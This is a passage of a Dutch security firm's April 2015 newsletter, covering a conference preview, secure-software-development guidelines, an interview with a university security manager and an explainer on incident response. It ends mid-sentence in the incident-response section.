update i T S X DE COLUMN 2 Remco Huisman HET NIEUWS 3 NEN 7510: aantoonbaar in control? Kennispartnership HSD Hands-on kennisoverdracht

Your Security is Our Business

24

april 2015

u p d a t e DE COLUMN

2

HET NIEUWS

3

HET event

4

het inzicht

6

de klant

8

Remco Huisman

• NEN 7510: aantoonbaar in control? • Kennispartnership HSD • Hands-on kennisoverdracht

Black Hat Sessions Part XIII: Hoe veilig is (IT in) Nederland?

Rob van der Veer van de SIG over Secure Software Development

8 vragen aan Frank Brokken, Security Manager bij de Rijksuniversiteit Groningen (RUG)

ITSX

10

De hack

12

• Marcus Bakker geeft uitleg over incident response • Marloes Kwakkel stelt zich voor

Rinke Beimin over het uitbuiten van XSS-kwetsbaarheden

Workshops en Cursussen 15 agenda 15 HET COLOFON

i

T

S

X

15

In iedere Madison Gurkha Update vindt u een leuke en informatieve column, die de lezer een verfrissende kijk biedt op uiteenlopende onderwerpen rondom IT-beveiliging. Deze keer laten we Remco Huisman aan het woord.

de column

Hoe veilig is uw IT? Op het moment dat ik deze column schrijf, 18 maart 2015, zijn de voorbereidingen voor de Black Hat Sessions die plaatsvindt op 18 juni a.s. in volle gang. We zijn eigenlijk al een heel eind gevorderd. Het programma is ingevuld en eerder vandaag is de leaflet richting de drukker gegaan. Het thema van deze editie van het jaarlijkse security congres van Madison Gurkha luidt: “Hoe veilig is (IT in) Nederland?” Die brede vraag zou eigenlijk iedereen moeten vertalen naar de eigen organisatie. “Hoe veilig is onze IT?”. Om die vraag te beantwoorden laten onze opdrachtgevers structureel testen uitvoeren op een breed scala van doelen. Vaak gaat het om zogenaamde ‘internet facing systemen’ zoals (corporate) websites, klantenportalen, thuiswerkoplossingen, VPN-connecties etc. En soms gaat het ook om interne systemen. Hoe veilig is ons interne kantoornetwerk gezien vanuit de ‘binnenkant’? Het valt ons op dat er relatief weinig aandacht is voor bepaalde systemen, die toch erg bepalend zijn voor de veiligheid van IT in organisaties en daarmee voor de ITveiligheid van ons land. Ik zal in deze column niet ingaan op de veiligheid van SCADA/ICS-systemen. Daarvoor is al wat langer aandacht en tijdens de Black Hat Sessions zal hier door sprekers uit het veld uitgebreid op in worden gegaan. Maar waar ik wel graag aandacht voor wil vragen is het volgende. Ten eerste zijn dat IT-systemen in wat ik zou noemen “facility management netwerken”. Voor zover deze systemen al opgenomen zijn in een apart netwerk. Typische systemen die wij in facility management netwerken aantreffen zijn onder andere toegangscontrolesystemen. Als u uw RFID-pas voor een lezer houdt, dan wordt vervolgens aan een systeem in het netwerk gevraagd of de pas met uw ID door het betreffende poortje mag. Zo’n systeem is vanuit een “hacker” perspectief erg interessant. Als een hacker dat systeem over kan nemen kan hij bepalen welke toegangspassen welke rechten hebben en kan hij zelfs nieuwe (valse) pas ID’s aanmaken. Het wordt dan ineens wel erg simpel om fysiek toegang tot een gebouw te krijgen.

2

Madison Gurkha april 2015

Andere systemen die je op dit soort netwerken binnen organisaties aantreft zijn bijvoorbeeld kassasystemen (van de kantine), IP-camera’s van de bewaking, alarmsystemen, klimaatbeheersingssystemen etc. Veel van dit soort systemen zijn kwetsbaar omdat ze moeilijk gepatched kunnen worden en vaak langdurig worden gebruikt. In dat opzicht lijken de systemen op SCADA/ICS-systemen die in de procesindustrie worden gebruikt. Heeft u wel eens een technisch beveiligingsonderzoek laten uitvoeren naar de kwetsbaarheid van het facility management netwerk? Onze ervaringen bij dit soort onderzoeken laten tot nu toe zien dat ze het onderzoeken meer dan waard zijn (en dan druk ik me voorzichtig uit). Tot slot wil ik graag uw aandacht vragen voor ERP-systemen. U heeft hierover al meer kunnen lezen in de rubriek “Het Inzicht” van de vorige Madison Gurkha Update. Het SAP-systeem is voor organisaties vaak hét kroonjuweel en de kwetsbaarheid van deze systemen verdient meer aandacht dan het nu vaak krijgt. Tijdens de Black Hat Sessions zullen we wat betreft SAP-systemen dieper op de materie ingaan tijdens de lezing “The Latest Changes to SAP Cybersecurity Landscape”. Deze presentatie zal worden gegeven door Alexander Polyakov of Dmitry Chastuchin, beide van Business Application Security provider ERPscan. Interessante onderwerpen waarover ik graag met u een keer verder van gedachten wissel. Graag tot ziens op 18 juni a.s. in Ede en veel leesplezier met deze Update. Remco Huisman Partner, commercieel directeur

In ‘Het Nieuws’ belichten we nieuwe ontwikkelingen in de IT-beveiligingswereld en rondom Madison Gurkha.

het NIEU W S

NEN 7510: aantoonbaar in control? De decentralisatie naar gemeenten en de toenemende behoefte aan privacy hebben ook de wetgever wakker geschud. Zo is de verwachting dat op korte termijn de NEN-normen 7510 (versie 2011) en 7513 verplicht zullen worden gesteld. Het wachten is nog op de goedkeuring door de Eerste Kamer. Met name de zorg in Nederland ligt de laatste tijd onder een vergrootglas van zowel de politiek als de toezichthouders. De verplichting van de NEN 7510 betekent voor deze sector dat zij de beveiliging van hun informatie op orde moeten hebben en aantoonbaar ‘in control’ moeten zijn. Zorgvuldige omgang met (medische) persoonsgegevens vereist zowel kennis van het recht, als de organisatorische en technische (beveiligings)maatregelen. Om die reden biedt Madison Gurkha samen met ITSX en Louwers IP|Technology Advocaten, een integrale oplossing aan waarbij aan al deze drie invalshoeken gezamenlijk aandacht wordt besteed. Tijdens de afgelopen vakbeurs Zorg & ICT op 18 en 19 maart jl. hebben wij een aantal presentatiesessies verzorgd om de bezoekers te informeren over dit onderwerp aan de hand van een inspirerende casus. Een soortgelijke presentatie verzorgen we ook tijdens Overheid 360° op 22 en 23 april a.s. waarbij uiteraard de casus gespecificeerd is op de overheid.

Wij gaan verhuizen! Het hoge woord mag eruit. Madison Gurkha gaat verhuizen. Ons nieuwe kantoor bevindt zich een aantal meter verderop aan de Vestdijk 59, naast het kantoor van De Lage Landen. Binnenkort ontvangt u van ons nog een officieel verhuisbericht. Hoewel we onze vertrouwde werkplek zeker zullen missen, kijken we er erg naar uit om in deze nieuwe moderne werkomgeving aan uitdagende projecten te mogen werken. In de volgende Update zullen we met trots wat foto’s laten zien van ons nieuwe kantoor.

Meehelpen aan een veiliger wereld doen we graag! The Hague Security Delta (HSD) is een groeiend netwerk van bedrijven, overheden en kennisinstellingen in binnen- en buitenland, die samenwerken om producten, diensten of kennis te ontwikkelen voor een veiliger wereld. Madison Gurkha ondersteunt dit initiatief volledig en deelt graag haar kennis op het gebied van Cyber Security, Critical Infrastructure en Forensics. Madison Gurkha heeft zich daarom aangesloten bij het netwerk en is sinds maart jl. kennispartner van HSD. Dochterbedrijf ITSX is ook partner en sinds juni 2014 gevestigd op de campus van HSD.

Hands-on kennis opdoen Eerder dit jaar organiseerden wij voor de tweede maal de workshop Hacken met een Teensy. Gezien de grote animo voor dit soort hands-on kennisoverdracht en de positieve reacties na afloop, is er ook dit jaar tijdens de Black Hat Sessions voldoende ruimte gemaakt voor een interactieve workshop. Dit keer leggen we uit hoe een XSS-kwetsbaarheid gebruikt kan worden om domain admin-rechten te krijgen. Meer over deze workshop en andere cursussen leest u elders in deze Update.

Madison Gurkha april 2015

3

Op 18 juni a.s. organiseert Madison Gurkha alweer voor de dertiende maal het inmiddels befaamde security congres Black Hat Sessions. Het thema dit jaar is: Hoe veilig is (IT in) Nederland?

het e v ent

18 juni 2015 | De ReeHorst in Ede | Black Hat Sessions Part XIII

Hoe veilig is (IT in) Nederland? Onze samenleving en economie zijn kwetsbaar door de toenemende afhankelijkheid van ICT. De vraag “Hoe veilig is (IT in) Nederland?” is dan ook relevanter dan ooit. Zowel voor techneuten als het management belooft het een inspirerende dag te worden met interessante sprekers uit het veld, informatieve workshops en voorbeelden uit de praktijk. Het is natuurlijk ook een uitgelezen kans om met vakgenoten van gedachten te wisselen en bij te praten. energie en water, maar ook aan transport en telecommunicatie. En wat zijn de financiële sector en gezondheidszorg zonder IT? Het einde van de digitalisering is nog lang niet in zicht. Met het internet verbonden systemen in huis, in de auto en rondom het lichaam worden gemeengoed. Onze samenleving en economie zijn kwetsbaar door de toenemende afhankelijkheid van ICT. De vraag is dan ook niet of, maar wanneer het volgende grote incident zich aandient. Het Nationaal Cyber Security Centrum (NCSC), onderdeel van de NCTV, draagt bij aan het gezamenlijk vergroten van de weerbaarheid van de Nederlandse samenleving in het digitale domein en is daarmee een belangrijke speler op dit gebied. Tijdens de Black Hat Sessions wordt u in één dag bijgepraat door prominente nationale en internationale sprekers. We besteden in een gevarieerd dagprogramma onder andere aandacht aan DDoS-aanvallen, SCADA/ICSsystemen, Top-Level Domains, SIEM, secure smart grids en SAP security. Naast de plenaire sessies is er de keuze uit een technische track en een management track zodat u ongeacht uw achtergrond een interessant programma kunt volgen. Een aantal lezingen en demonstraties zijn diep-technisch, terwijl andere juist bij uitstek geschikt zijn voor het management. Het is natuurlijk ook een uitgelezen kans om met vakgenoten van gedachten te wisselen over al deze onderwerpen. IT is onmisbaar Binnen een groot deel van de vitale infrastructuur is IT onmisbaar geworden: denk hierbij aan de levering van

De vraag is dan ook niet of, maar wanneer het volgende grote incident zich aandient

4

Madison Gurkha april 2015

Het NCSC heeft verschillende initiatieven ontplooid om Nederland veilig te houden, waaronder het Nationaal Respons Netwerk (NRN) en het Nationaal Detectie Netwerk (NDN). In het NRN bundelen het NCSC en ICT-responsorganisaties uit publieke en private sectoren hun ervaring, kennis en capaciteit op het gebied van incident response. Een ander voorbeeld van netwerkgericht de handen ineen slaan, is het delen van dreigingsinformatie binnen het NDN. Hierbij wordt door het NCSC en haar partners operationele informatie waarmee digitale aanvallen en aanvallers kunnen worden gedetecteerd gedeeld met publieke en private partijen. Wat is de stand van zaken op het gebied van de kritieke infrastructuur in Nederland? Mr. Hans de Vries, hoofd van het NCSC, zal het publiek tijdens de Black Hat Sessions Part XIII bijpraten over de actuele dreigingen in het digitale domein. Hij gaat daarbij in op de door het NCSC geïnitieerde projecten zoals de NRN en NDN om de digitale weerbaarheid verder te verhogen. Uiteraard zal het NCSC haar best doen om zoveel als mogelijk informatie met het publiek te delen. Het belooft een boeiende keynote te worden. Ir. Eric Luiijf is een vooraanstaand deskundige op het gebied van veiligheid van vitale infrastructuur (en informa-

Het event

tie-infrastructuur), en de militaire en civiele aspecten van cyberactivisme, -terrorisme en -conflicten. In 2002/2003 was Eric met zijn projectteam betrokken bij de beleidsvorming rondom de Nederlandse vitale infrastructuur. Sindsdien onderzoekt hij in een reeks Europese projecten de bescherming van vitale (informatie)infrastructuren, onder andere tegen domino-uitval (ACIP, IRRIIS, EURAM, EURACOM, DIESIS, RECIPE, CIPRNet, PREDICT, INTACT en SEGRID). Eric Luiijf zal tijdens de Black Hat Sessions een keynote verzorgen waarbij hij vanuit zijn rol als principal consultant bij het TNO, ingaat op de actualiteiten omtrent het thema. Zowel Eric Luiijf als Hans de Vries zijn vanuit hun positie nauw betrokken bij het thema en zij zullen u een interessante kijk bieden op de materie. Helaas hebben we hier geen ruimte om alle sessies uit te lichten, maar het overige sprekersprogramma is minstens zo interessant. Zie hieronder een korte samenvatting. Op www.blackhatsessions.com vindt u het volledige programmaoverzicht. K. Reid Wightman, directeur van Digital Bond Labs en voormalig specialist bij het Pentagon vertelt over de kwetsbaarheden in ICS-systemen. Alex Bik, CTO bij internetprovider BIT, gaat in op techniek achter de anti-DDoS Wasstraat. Teun van Dongen, zelfstandig auteur en analist op het gebied van nationale en internationale veiligheid, zal het publiek aanzetten tot een kritische reflectie over de manier waarop we in Nederland met nationale veiligheid en terrorismebestrijding omgaan. Ed de Myttenaere en Paul van der Ploeg, van Nuclear Research & consultancy Group (NRG), zullen ingaan op de nucleaire sector. Vanuit Business Application Security pro-

vider ERPscan wordt een boeiende presentatie verzorgd met als titel “The Latest Changes to SAP Cybersecurity Landscape”. Deze presentatie zal worden gegeven door Alexander Polyakov of Dmitry Chastuchin. Beide zijn bekend van o.a. BlackHat, Hack in the Box en t2 infosec. Erwin Kooi, security architect bij Alliander - IT Digitale Netten, geeft tijdens een technische sessie een introductie in secure smart grids, de security uitdagingen daarvan en hoe Alliander hiermee omgaat om ook in de toekomst voor een goede stroomvoorziening te kunnen zorgen. Maciej Korczynski, postdoctoraal onderzoeker op het gebied van cyber security verbonden aan de TU Delft, zal ingaan op de beveiliging van Top-Level domeinen (TLD’s) en Daniël Dragicˇevic´ , security consultant bij Madison Gurkha verzorgt samen met een collega een uitgebreide technische demonstratie. Meld u aan als relatie van Madison Gurkha Wij hopen dat u deze dag (wederom) samen met ons wilt doorbrengen in de ReeHorst in Ede. Uiteraard geldt voor relaties van Madison Gurkha een relatiekorting. Geef bij uw aanmelding via het inschrijfformulier de code 6efPvuqC op en de 10% korting wordt direct verrekend. Wellicht is dit congres ook interessant voor uw collega’s? U kunt gebruik maken van de extra geldende groepskortingen van 10% bij 5 tot 10 deelnemers. Meldt u meer dan 10 deelnemers tegelijkertijd aan, dan profiteert u van 15% extra groepskorting. Groepsaanmeldingen kunt u per email aan [email protected] versturen. Gezien de grote animo van vorig jaar is er ook dit jaar ruimte vrijgemaakt voor een interactieve workshop: “Van XSS naar domain admin”. Bovendien wordt er een “PGP Key Signing Party” georganiseerd. Meer hierover leest u elders in deze Update.

Zorg dat u erbij bent en meld u snel aan. Vul de code 6efPvuqC in bij uw online inschrijving en de 10% relatiekorting wordt direct verrekend! Meer informatie over het congres en het inschrijfformulier vindt u op www.blackhatsessions.com.

Madison Gurkha april 2015

5

In de rubriek Het Inzicht stellen wij bepaalde (technische) beveiligingsproblemen aan de orde. Dit keer geeft Rob van der Veer van de Software Improvement Group (SIG) meer inzicht in Secure Software Development.

het in z icht

Duidelijkheid over veilige software Grip op Secure Software Development is een verzameling richtlijnen over samenwerken voor goed beveiligde software. Het is een co-productie van tientallen specialisten, opdrachtgevers en leveranciers, onder de paraplu van het CIP: het Centrum voor Informatiebeveiliging en Privacybescherming. De richtlijnen gaan over de samenwerking tussen opdrachtgever en softwareontwikkelaar en het beschrijven van duidelijke en meetbare beveiligingseisen. Deze publicaties zijn vrij beschikbaar op www.gripopssd.org en worden onderhouden door meer dan 20 organisaties in de groep ‘Practitioners Grip op SSD’, met Cap Gemini, IBM, UWV, Postnl, CIBG, Dictu, Belastingdienst, SVB, Binnenlandse Zaken, OWASP, CGI, Sogeti, Ordina, Software Improvement Group, DKTP en Valori. Naast deze richtlijnen zijn ook trainingsmaterialen, testmethodes en inkoopcontracten voor vrij gebruik beschikbaar. Het bijzondere van deze samenwerking is dat de betrokken organisaties een manifest

6

Madison Gurkha april 2015

tekenen waarin ze zeggen achter de Grip op SSD richtlijnen te staan met de belangrijke opmerking dat daarvan kan worden afgeweken - mits dat wordt toegelicht aan de groep. Het zijn juist die afwijkingen die interessant zijn om te gebruiken als uitbreiding en verbetering van de richtlijnen. Dit resulteert in het delen van kennis en ervaring, zoals bijvoorbeeld de Cloud Security Alliance die helpt om security-aspecten specifiek voor de cloud toe te voegen. De richtlijnen zijn dus geen keurslijf, maar een communicatiemiddel en de betrokkenheid van zoveel partijen zorgt voor duurzame doorontwikkeling. Door deze samenwerking hoeven organisaties niet meer zelf het wiel uit te vinden wat betreft het maken van afspraken, contracten

en beheersingsprocessen. Leveranciers vinden het ook prettig dat er een standaard manier van werken is met meerdere van hun klanten. Ontstaan van Grip op SSD In mijn werk voor de SIG help ik organisaties met vraagstukken over softwarekwaliteit. Is een systeem onderhoudbaar? Schaalt het? Ook word ik gevraagd te kijken of de security goed is ingebouwd en dan valt op dat hier de meest elementaire fouten worden gemaakt. SIG meet software security op een schaal van 1 tot 5 sterren en wat we veel zien zijn systemen die twee sterren scoren. Bij nader onderzoek blijkt dat dit vooral wordt veroorzaakt door onduidelijke afspraken en

het inz icht Welk probleem lost dit op? een gebrek aan een goede toetsing. Veel organisaties willen hier iets aan doen en zijn op zoek naar goede manieren om te regelen dat de gebruikte software veiliger wordt. Over dit onderwerp raakte ik begin 2013 vanuit SIG in gesprek met het CIP. We wilden iets doen aan dit probleem en we zagen de behoefte aan een handreiking die opdrachtgevers en leveranciers laat zien wat je kan doen om samen tot veilige software te komen. Vervolgens is er een werkgroep opgericht en zijn we gaan schrijven. Vooral Marcel Koers, toenmalig CISO van het UWV, heeft hier het schrijfwerk verricht, geholpen door vele andere specialisten. We hoefden hier natuurlijk niet het wiel uit te vinden want er was al veel ontwikkeld en geschreven. De kunst was om de beschikbare informatie handzaam en duidelijk bij elkaar te brengen en in een haalbare vorm te gieten. Dat is gelukt door gebruik te maken van volwassenheidsniveaus. Iedereen kan het. De methode De methode Grip op SSD beschrijft hoe een opdrachtgever grip krijgt op het laten ontwikkelen van goed beveiligde software. Dat kan bij een interne ontwikkelafdeling zijn of bij een externe leverancier. De drie pijlers van de methode zijn: 1. standaard beveiligingseisen 2. contactmomenten 3. het inrichten van de juiste processen

Deze processen zijn onder meer het bijhouden van risico’s, het onderhouden van eisen en het laten groeien van de organisatie naar hogere volwassenheidsniveaus. Voor de definitie van de normen is een nieuwe, fundamentele beschrijvingswijze (SIVA) gehanteerd, met zeggingskracht voor managers, ontwikkelaars, testers, auditors en securityspecialisten. De normen zijn gestoeld op de NCSC-richtlijnen voor (web)applicaties. Per norm wordt de link gelegd naar gerelateerde richtlijnen van NCSC en van OWASP ASVS (Application Security Verification Standard). Ook wordt per onderdeel aangegeven wie verantwoordelijk is: opdrachtgever, bouwer of bijvoorbeeld hostingpartij. Inmiddels heeft IBM de normen laten vertalen naar het Engels. We zien nu dat bij het toepassen van Grip op SSD de betrokken opdrachtgevers en software-ontwikkelaars beter weten waar ze aan toe zijn en er een einde komt aan hun babylonische spraakverwarring. Security after the fact wordt daarmee security by design.

Rob van der Veer Software Improvement Group [email protected] 020 314 09 50

We hoeven de krant maar open te slaan om te zien dat het slecht gesteld is met de veiligheid van software. Hier volgen enkele uitspraken uit de praktijk om aan te geven waar het mis gaat en hoe Grip op SSD daarop inspeelt. “Wij gaan ervan uit dat een leverancier weet hoe je veilige software maakt.” Mooi, maar hoe weet de leverancier wat jij veilig genoeg vindt voor de toepassing? Bovendien, als je alleen functies beschrijft, dan zal de leverancier zich vooral daarop concentreren als de tijd dringt. Grip op SSD beschrijft hoe je de veiligheid afstemt met “comply or explain”. “Ik dacht dat de hostingpartij dat zou regelen.” Grip op SSD maakt expliciet waar verantwoordelijkheden en taken liggen, bijvoorbeeld als het gaat om patching van componenten. “We hadden niet verwacht dat securityeisen getoetst zouden worden.” Ontwikkelaars willen graag veilige software schrijven, maar eisen zijn vaak niet duidelijk of ontbreken en er wordt niet of pas laat getoetst, bijvoorbeeld met een pentest. Een leverancier fixt dan de daarin gevonden lekken en het is klaar. Typisch gebeurt dat in de drukste periode waardoor er onvoldoende tijd is voor structurele verbeteringen. Grip op SSD beschrijft hoe je vooraf, tijdens en na ontwikkeling de veiligheid kunt toetsen. “O, leidt dat tot reputatieschade?” In de praktijk blijkt dat softwarebouwers onvoldoende begrijpen wat de gevolgen zijn van bepaalde fouten. Grip op SSD geeft aan dat de resultaten van risicoanalyses worden gecommuniceerd naar alle ontwikkelaars. “Het moet aan de OWASP top 10 voldoen.” Deze top 10 is heel belangrijk voor bewustwording, maar is niet specifiek en niet compleet en daarmee ongeschikt als afspraak. Eén van de OWASP top 10 kwetsbaarheden is “het lekken van gevoelige data”. Als opdrachtgever wil je duidelijker zijn over wat je hier verwacht. De standaard beveiligingseisen in Grip op SSD zijn hier expliciet over.

Madison Gurkha april 2015

7

In elke Madison Gurkha Update laten wij een klant aan het woord. Dit keer een openhartig gesprek met Frank Brokken, Security Manager bij de Rijksuniversiteit Groningen.

D e k l ant

8 vragen aan ... ... Frank Brokken, Security Manager bij de Rijksuniversiteit Groningen (RUG).

1

Wat is je rol binnen de RUG? Vanuit mijn rol als Security Manager geef ik gevraagde en ongevraagde adviezen aan de directie van het Centrum voor Informatietechnologie (CIT). In deze positie is het belangrijk om volstrekt onafhankelijk te zijn. Dit kan nog wel eens tot ‘clashes’ leiden, maar gelukkig wordt de waarde er wel van ingezien. Bovendien vind ik het belangrijk om contact en feeling te houden met de technici die de machines onderhouden en bedienen. Naast mijn rol als Security Manager geef ik vanuit het CIT onderwijs in de programmeertaal C++, en vanuit de vakgroep Informatica geef ik de vakken Information Security en Computer-architectuur.

2

Hoe is informatiebeveiliging georganiseerd binnen de RUG? Een van mijn eerste taken was om een universitair-brede ‘Acceptable Use Policy’ (AUP) op te stellen. Deze AUP is in 2001 door het college van bestuur (CvB) geaccepteerd. Dit heeft binnen de RUG gezorgd voor een formeel-juridische basis waarop de IT-beveiliging wordt gebaseerd en aan getoetst kan worden. Sinds ongeveer 2002 wordt ik bijgestaan door een groep van ongeveer acht collega’s die samen de ‘Security Kerngroep’ vormen. In de praktijk bereidt de Security Kerngroep het beleid op het gebied van IT security voor, waarna de directie CIT en/of het CvB van de RUG de voorstellen al dan niet overneemt. Bij deze groep zijn niet alleen technici betrokken, maar bijvoorbeeld ook het hoofd van juridische zaken om te voorkomen dat we op het gebied van regelgeving blunderen. Voor ernstige IT-incidenten is er een vergelijkbare groep. Het zogenaamde ‘Crashteam’ bestaande uit collega’s met een meer dan gemiddelde kennis op de IT-gebieden die voor de RUG van belang zijn. Op dit moment worden er binnen de RUG stappen ondernomen om een RUG-breed Security Team te ontwikkelen waarbij de Security Manager , samen met een nog aan te stellen Privacy Functionaris, de algehele IT-beveiliging van de RUG zal organiseren. Hierin zullen ook vertegenwoordigers van onderwijs, onderzoek en overige ondersteunende diensten plaatsnemen.

8

Madison Gurkha april 2015

3

Hoeveel mensen houden zich binnen de RUG bezig met informatiebeveiliging? Ik hoop natuurlijk dat dat er zo’n 40.000 zijn: alle studenten en medewerkers. Maar ik vrees dat ik daar in de realiteit niet op uitkom. Wanneer ik de hierboven genoemde groepen bij elkaar optel dan zijn er dat zo’n 25. Waarschijnlijk doe ik dan nog een aantal collega’s onrecht. Daarvoor corrigerend kom ik op ongeveer 50 personen.

4

Zijn er ook contacten met andere universiteiten / hoge scholen? Welke rol speelt SURFnet op dit gebied? Die zijn er zeker. Wij zijn ook nauw betrokken bij SURFibo. IBO staat voor Informatie Beveiligers Overleg en vertegenwoordigt het Nederlands hoger onderwijs (en academische ziekenhuizen). IBO is rond 2003 voortgekomen uit de toenmalige SOHO groep (Security Officers voor het Hoger Onderwijs). Bij de oprichting van de IBO-groep was ik gedurende een paar jaar voorzitter. Daarna is die functie overgenomen door Alf Moens (eerst TU Delft, inmiddels SURF) en momenteel is Bart v.d. Heuvel (Universiteit Maastricht) de voorzitter. SURFnet speelt een belangrijke rol doordat het uiteindelijk de sluis is waardoor al ons IT-verkeer wordt getransporteerd. Er zijn dus goede contacten met SURFnet, ook in SURF-ibo en SCIRT (SURFnet Community of Incident Response Teams) verband.

5

In welke mate is IT van belang voor de bedrijfsvoering binnen de RUG? Op dit moment is het functioneren van de IT-faciliteiten welhaast een ‘conditio sine qua non’ voor de RUG. Uiteraard denk je dan aan standaard zaken als werkstations, web- en e-mailfaciliteiten en rekenkracht om enorme hoeveelheden data te kunnen verwerken. Maar daarnaast is er een minder in het oog springende, maar voor het functioneren van de RUG minstens zo belangrijke ‘schaduwwereld’. En dan heb ik het over toegang tot gebouwen, de bewaking van die gebouwen, de controle van koelinstallaties, de aansturing van apparaten die bijvoorbeeld bij natuurwetenschappelijk onderzoek worden gebruikt en het intern betalingsverkeer dat in hoge mate afhankelijk is van de IT.

6

Wat zijn de belangrijkste uitdagingen op het gebied van informatiebeveiliging? Eigenlijk is dat de ‘strijd’ tussen het economisch denken en het realiseren van een fatsoenlijk niveau van beveiliging. Een voorbeeld hiervan is het besluit van de RUG

de De kl k l a nt

om e-mail en grote delen van de dataopslag bij Google onder te brengen. Een enigszins merkwaardig besluit gezien de toen al openbaar gemaakte bevindingen van Edward Snowden. Nog afgezien van de vraag of Google inderdaad beter in staat is om de gewenste faciliteiten aan te bieden, is het toch ook een beetje een motie van wantrouwen naar je eigen technisch personeel. Een mooi voorbeeld waarbij beveiliging ondergeschikt aan economische motieven is gemaakt. Terugkomend op een hierboven eerder beantwoorde vraag: de grote uitdaging is om die 40.000 personen tot een andere mentaliteit te bewegen. Ik denk dat de techniek hier niet het probleem is. Het probleem is hoe je de doorsnee IT-gebruiker ‘security minded’ maakt. Vorig jaar werd bij de RUG de actie ‘Your bytes are your babies’ uitgevoerd. Een beroerde titel, maar een goede actie. Daarbij werd de hele universitaire gemeenschap er indringend op gewezen dat je voorzichtig om moet gaan met de door jouw beheerde informatie, en niet zomaar overal op moet klikken. Iedereen was zich van deze actie bewust en heel veel medewerkers hebben toen voorlichtingsbijeenkomsten gevolgd. Maar wat zie je? In de maanden daarna trappen elke maand nog zo’n 80 hoogopgeleide medewerkers in phishing-pogingen. Het excuus “Ik dacht dat het een authentiek mailtje was” is zo gek nog niet. Sinds een jaar of tien proberen we officiële RUG e-mail geauthenticeerd de deur uit te laten gaan. Zodra iedereen massaal z’n e-mail S/MIME of controleerbaar PGP signeert ben je van het phishing probleem verlost. Zie? De techniek is er wel, maar het gebeurt niet. En daar ligt de uitdaging: de mentaliteitsverandering.

7 8

Welke maatregelen worden genomen om bestaande ITbeveiligingsrisico’s onder controle te houden? I can tell you, but then I’ll have to kill you... [James Bond, dr. No, 1962]

Hoe ondersteunt Madison Gurkha de RUG en wat zijn uw ervaringen tot nu toe? De RUG vraagt Madison Gurkha om elke paar jaar een audit uit te voeren van de IT-faciliteiten van de RUG. Daar komen interessante resultaten uit, die soms wel en soms niet door de directie CIT en CvB worden overgenomen. De samenwerking met Madison is prima en geeft doorgaans voldoende ‘munitie’ om een aantal wezenlijke verbeteringen voor te stellen of voor te bereiden.

Madison Gurkha april 2015

9

Dit keer in de ITSX-rubriek geeft Marcus Bakker, IT security consultant, uitleg over incident response. Verder stelt Marloes Kwakkel zich aan u voor.

ITSX

Incident response Organisaties worden zich steeds meer bewust van de noodzaak van goede IT-beveiliging en de impact die security incidenten kunnen hebben. De meeste maatregelen die getroffen worden, zijn bedoeld om incidenten te voorkomen. Door toenemende complexiteit en afhankelijkheden is het voorkomen van alle incidenten niet meer mogelijk. Hierdoor moet een organisatie weten hoe ze moet reageren op een incident. Dit proces staat bekend als incident response. Bij incident response worden acties uitgevoerd om de schade, nadat een security incident heeft plaatsgevonden, tot het minimum te beperken (bijv. het uitlekken van klantgegevens naar het internet). Correcte informatiebeveiliging bestaat echter uit drie fases: protectie, detectie en response. Deze fases dienen goed met elkaar geïntegreerd te zijn en steunen daarbij op elkaars processen. Protectie Bij protectie kan men denken aan een actief uitgevoerd informatiebeveiligingsbeleid, bewustzijn binnen de gehele organisatie over IT-beveiligingsrisico’s en de mogelijke impact van incidenten op de bedrijfsvoering. Ook toegangscontrole tot systemen en applicaties en het uitvoeren van technische onderzoeken ter verhoging van het niveau van beveiliging vallen onder protectie. Dit laatste zijn bijvoorbeeld penetratietesten op applicaties en risicoanalyses van nog te bouwen of reeds aanwezige applicaties en/of IT-infrastructuren. Detectie Een voorbeeld van detectie is een Intrusion Detection System (IDS). Dit kan (pogingen tot) misbruik van kwetsbaarheden in de IT-infrastructuur signaleren (en ook tegenhouden). Maar het kan ook een automatische controle van logbestanden op mogelijke inbraakpogingen door aanvallers zijn. Hiervoor kan bijvoorbeeld een security information and event management (SIEM) worden gebruikt.

10

Madison Gurkha april 2015

Omdat bij detectie de meeste security incidenten naar voren zullen komen zal het incident response proces voor een groot deel worden gevoed door meldingen uit deze fase. Organisaties zijn zich steeds bewuster van het feit dat niet elk security incident te voorkomen is door goede protectie en detectie. Immers, IT is complex waardoor beveiliging hiervan lastig is (heeft u ooit een Patch Tuesday van Microsoft gezien zonder beveiligingsupdates?). Inbraakpogingen zullen er altijd zijn, omdat veel waardevolle bedrijfsprocessen en gegevens staan opgeslagen in IT-systemen. Deze inbraakpogingen kunnen grote gevolgen hebben voor de bedrijfsvoering en/of het imago van de organisatie. Daarnaast is er bij organisaties steeds meer de behoefte aan het op de juiste manier afhandelen van de installatie van noodpatches en andere spoedacties met een hoge prioriteit. Ook deze acties kunnen door middel van een goed incident response proces worden beheerst. Wat zijn de belangrijkste acties die een organisatie dient uit te voeren als er een security incident optreedt? We nemen het voorbeeld van een grote website waarvan de gegevens uit de gebruikersdatabase zijn uitgelekt (gebruikersnamen, wachtwoorden, e-mailadressen). Het incident wordt pas opgemerkt nadat er berichten in de media zijn verschenen. In dit geval heeft detectie helaas

gefaald. Beter is het wanneer incidenten opgemerkt worden op basis van meldingen uit detectiemethoden. Het is van belang de impact van het incident zo snel mogelijk te beperken. Er dient te worden geanalyseerd waarom de gebruikersgegevens konden uitlekken zodat de kwetsbaarheid direct kan worden verholpen. Als de kwetsbaarheid niet heel snel kan worden achterhaald en opgelost, is het aan te raden de website tijdelijk uit de lucht te halen. Verder dienen de betrokken stakeholders over het incident te worden geïnformeerd. Aan gebruikers meld je o.a. welke gegevens zijn uitgelekt en adviseer je

Er dient te worden geanalyseerd waarom de gebruikersgegevens konden uitlekken zodat de kwetsbaarheid direct kan worden verholpen.

IT SX

de wachtwoorden voor andere websites te wijzigen als daarvoor hetzelfde wachtwoord wordt gebruikt. In interne communicatie naar medewerkers, zoals de klantenservice, wordt verder nog vermeld wat wel en niet mag worden gecommuniceerd richting klanten met betrekking tot het incident. Voor elke stakeholder kan de gecommuniceerde informatie en de manier waarop dit wordt gebracht verschillen. Om het vertrouwen van stakeholders te behouden is transparantie erg belangrijk. Stakeholders dienen op de hoogte te worden gehouden van belangrijke ontwikkelingen over het security incident. Houd er rekening mee dat er veranderingen op komst zijn vanuit de wetgever die het melden van lekken van persoonsgegevens verplicht stellen! Gedurende het incident of nadat de kwetsbaarheid is verholpen kan de beslissing worden genomen verdere analyse uit te voeren. Heeft de aanvaller naast gebruikersgegevens nog andere vertrouwelijke gegevens kunnen stelen en/of systemen kunnen overnemen in de IT-infrastructuur? Centrale logging van events voortkomend uit systemen, applicaties en netwerkapparatuur is heel waardevol bij deze 